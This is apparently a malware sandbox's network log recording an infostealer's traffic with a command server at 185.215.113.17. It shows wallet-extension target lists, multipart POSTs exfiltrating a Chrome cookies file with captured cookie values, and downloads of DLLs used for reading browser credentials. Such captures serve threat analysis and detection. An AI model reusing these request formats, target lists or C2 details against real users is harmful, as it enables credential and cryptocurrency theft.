Sep 3, 2024 17:13:18.083791018 CEST	224	IN	Data Raw: 62 57 35 68 62 47 74 6d 59 58 77 78 66 44 42 38 4d 48 78 46 59 33 52 76 49 46 64 68 62 47 78 6c 64 48 78 69 5a 32 70 76 5a 33 42 76 61 57 52 6c 61 6d 52 6c 62 57 64 76 62 32 4e 6f 63 47 35 72 62 57 52 71 63 47 39 6a 5a 32 74 6f 59 58 77 78 66 44 Data Ascii: bW5hbGtmYXwxfDB8MHxFY3RvIFdhbGxldHxiZ2pvZ3BvaWRlamRlbWdvb2NocG5rbWRqcG9jZ2toYXwxfDB8MHxDb2luaHVifGpnYWFpbWFqaXBicGRvZ3BkZ2xoYXBobGRha2lrZ2VmfDF8MHwwfE11bHRpdmVyc1ggRGVGaSBXYWxsZXR8ZG5nbWxibGNvZGZvYnBkcGVjYWFkZ2ZiY2dnZmpmbm18
Sep 3, 2024 17:13:18.084326982 CEST	1236	IN	Data Raw: 4d 58 77 77 66 44 42 38 52 6e 4a 76 62 6e 52 70 5a 58 49 67 56 32 46 73 62 47 56 30 66 47 74 77 63 47 5a 6b 61 57 6c 77 63 47 68 6d 59 32 4e 6c 62 57 4e 70 5a 32 35 6f 61 57 5a 77 61 6d 74 68 63 47 5a 69 61 57 68 6b 66 44 46 38 4d 48 77 77 66 46 Data Ascii: MXwwfDB8RnJvbnRpZXIgV2FsbGV0fGtwcGZkaWlwcGhmY2NlbWNpZ25oaWZwamthcGZiaWhkfDF8MHwwfFNhZmVQYWx8bGdtcGNwZ2xwbmdkb2FsYmdlb2xkZWFqZmNsbmhhZmF8MXwwfDB8U3ViV2FsbGV0IC0gUG9sa2Fkb3QgV2FsbGV0fG9uaG9nZmplYWNuZm9vZmtmZ3BwZGxibWxtbnBsZ2JufDF8MHwwfEZsdXZpIFd
Sep 3, 2024 17:13:18.084337950 CEST	328	IN	Data Raw: 59 6d 4a 77 62 57 68 70 61 47 56 6f 62 57 6c 6f 62 6d 52 74 62 57 4e 6b 59 57 35 68 59 32 39 73 62 6d 68 38 4d 58 77 77 66 44 42 38 51 6d 6c 30 5a 32 56 30 49 46 64 68 62 47 78 6c 64 48 78 71 61 57 6c 6b 61 57 46 68 62 47 6c 6f 62 57 31 6f 5a 47 Data Ascii: YmJwbWhpaGVobWlobmRtbWNkYW5hY29sbmh8MXwwfDB8Qml0Z2V0IFdhbGxldHxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHxUT04gV2FsbGV0fG5waHBscGdvYWtoaGpjaGtraG1pZ2dha2lqbmtoZm5kfDF8MHwwfE15VG9uV2FsbGV0fGZsZGZwZ2lwZm5jZ25kZm9sY2JrZGVla25iYmJuaGNjfDF
Sep 3, 2024 17:13:18.221457958 CEST	469	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBAAFIDGDAAAAAAAAKEB Host: 185.215.113.17 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 36 30 66 35 64 62 64 37 61 39 32 38 65 34 63 30 38 64 39 30 64 61 64 39 66 36 32 32 38 35 66 32 64 63 33 33 39 37 36 66 30 31 66 37 38 30 61 63 36 37 36 31 61 63 38 61 33 35 39 38 34 39 64 37 64 34 32 34 64 61 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 4b 45 42 2d 2d 0d 0a Data Ascii: ------DBAAFIDGDAAAAAAAAKEBContent-Disposition: form-data; name="token"e760f5dbd7a928e4c08d90dad9f62285f2dc33976f01f780ac6761ac8a359849d7d424da------DBAAFIDGDAAAAAAAAKEBContent-Disposition: form-data; name="message"fplugins------DBAAFIDGDAAAAAAAAKEB--
Sep 3, 2024 17:13:18.485913038 CEST	335	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:18 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Sep 3, 2024 17:13:18.560853004 CEST	202	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFHDHIJDGCBAKFIEGHCB Host: 185.215.113.17 Content-Length: 6715 Connection: Keep-Alive Cache-Control: no-cache
Sep 3, 2024 17:13:18.560889959 CEST	6715	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 36 30 66 35 Data Ascii: ------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="token"e760f5dbd7a928e4c08d90dad9f62285f2dc33976f01f780ac6761ac8a359849d7d424da------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Sep 3, 2024 17:13:18.900675058 CEST	202	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:18 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 3, 2024 17:13:19.245594978 CEST	93	OUT	GET /f1ddeb6592c03206/sqlite3.dll HTTP/1.1 Host: 185.215.113.17 Cache-Control: no-cache
Sep 3, 2024 17:13:19.512183905 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:19 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Sep 3, 2024 17:13:22.215352058 CEST	952	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBAAFIDGDAAAAAAAAKEB Host: 185.215.113.17 Content-Length: 751 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 36 30 66 35 64 62 64 37 61 39 32 38 65 34 63 30 38 64 39 30 64 61 64 39 66 36 32 32 38 35 66 32 64 63 33 33 39 37 36 66 30 31 66 37 38 30 61 63 36 37 36 31 61 63 38 61 33 35 39 38 34 39 64 37 64 34 32 34 64 61 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------DBAAFIDGDAAAAAAAAKEBContent-Disposition: form-data; name="token"e760f5dbd7a928e4c08d90dad9f62285f2dc33976f01f780ac6761ac8a359849d7d424da------DBAAFIDGDAAAAAAAAKEBContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------DBAAFIDGDAAAAAAAAKEBContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwNzg3MzgJMVBfSkFSCTIwMjMtMTAtMDUtMDgKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjk3OTM4CU5JRAk1MTE9b3JjU0lub1pCYjZTcncwUGRQTU5lTEdLc2VnZkxpLXRRbnZpaG81aEtKWEtETmcwa1hJUG5mVGN1d1Y1cjdScWpUODkzcFdHSkY3a2xLcWxkQm9qNHJESnZ4ZkZsZ0RPQ2NXOWFLRG5VOXpJbFVoMkxQMHZPOGszdVQwZ0hKRDFKdlZBY2xrSm5Ld1pHNmhEQWw2MkhyTXhOclVlcVNSLVdGMUotbDlZWWdFCg==------DBAAFIDGDAAAAAAAAKEB--
Sep 3, 2024 17:13:22.537674904 CEST	202	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:22 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 3, 2024 17:13:22.661149025 CEST	564	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBFIJEGIDBGIECAKKEGD Host: 185.215.113.17 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 42 46 49 4a 45 47 49 44 42 47 49 45 43 41 4b 4b 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 36 30 66 35 64 62 64 37 61 39 32 38 65 34 63 30 38 64 39 30 64 61 64 39 66 36 32 32 38 35 66 32 64 63 33 33 39 37 36 66 30 31 66 37 38 30 61 63 36 37 36 31 61 63 38 61 33 35 39 38 34 39 64 37 64 34 32 34 64 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 49 4a 45 47 49 44 42 47 49 45 43 41 4b 4b 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 49 4a 45 47 49 44 42 47 49 45 43 41 4b 4b 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------CBFIJEGIDBGIECAKKEGDContent-Disposition: form-data; name="token"e760f5dbd7a928e4c08d90dad9f62285f2dc33976f01f780ac6761ac8a359849d7d424da------CBFIJEGIDBGIECAKKEGDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CBFIJEGIDBGIECAKKEGDContent-Disposition: form-data; name="file"------CBFIJEGIDBGIECAKKEGD--
Sep 3, 2024 17:13:23.076780081 CEST	202	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:22 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 3, 2024 17:13:24.449621916 CEST	564	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBGIEGCFHCFHIDHIJECA Host: 185.215.113.17 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 36 30 66 35 64 62 64 37 61 39 32 38 65 34 63 30 38 64 39 30 64 61 64 39 66 36 32 32 38 35 66 32 64 63 33 33 39 37 36 66 30 31 66 37 38 30 61 63 36 37 36 31 61 63 38 61 33 35 39 38 34 39 64 37 64 34 32 34 64 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------EBGIEGCFHCFHIDHIJECAContent-Disposition: form-data; name="token"e760f5dbd7a928e4c08d90dad9f62285f2dc33976f01f780ac6761ac8a359849d7d424da------EBGIEGCFHCFHIDHIJECAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EBGIEGCFHCFHIDHIJECAContent-Disposition: form-data; name="file"------EBGIEGCFHCFHIDHIJECA--
Sep 3, 2024 17:13:24.760498047 CEST	202	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:24 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 3, 2024 17:13:25.339962006 CEST	93	OUT	GET /f1ddeb6592c03206/freebl3.dll HTTP/1.1 Host: 185.215.113.17 Cache-Control: no-cache
Sep 3, 2024 17:13:25.595598936 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:25 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Sep 3, 2024 17:13:26.772262096 CEST	93	OUT	GET /f1ddeb6592c03206/mozglue.dll HTTP/1.1 Host: 185.215.113.17 Cache-Control: no-cache
Sep 3, 2024 17:13:27.054157019 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:26 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Sep 3, 2024 17:13:27.603967905 CEST	94	OUT	GET /f1ddeb6592c03206/msvcp140.dll HTTP/1.1 Host: 185.215.113.17 Cache-Control: no-cache
Sep 3, 2024 17:13:27.864691019 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:27 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Sep 3, 2024 17:13:28.297903061 CEST	90	OUT	GET /f1ddeb6592c03206/nss3.dll HTTP/1.1 Host: 185.215.113.17 Cache-Control: no-cache
Sep 3, 2024 17:13:28.555716991 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:28 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Sep 3, 2024 17:13:30.226285934 CEST	94	OUT	GET /f1ddeb6592c03206/softokn3.dll HTTP/1.1 Host: 185.215.113.17 Cache-Control: no-cache
Sep 3, 2024 17:13:30.484966040 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:30 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Sep 3, 2024 17:13:31.087877989 CEST	98	OUT	GET /f1ddeb6592c03206/vcruntime140.dll HTTP/1.1 Host: 185.215.113.17 Cache-Control: no-cache
Sep 3, 2024 17:13:31.349184036 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 03 Sep 2024 15:13:31 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 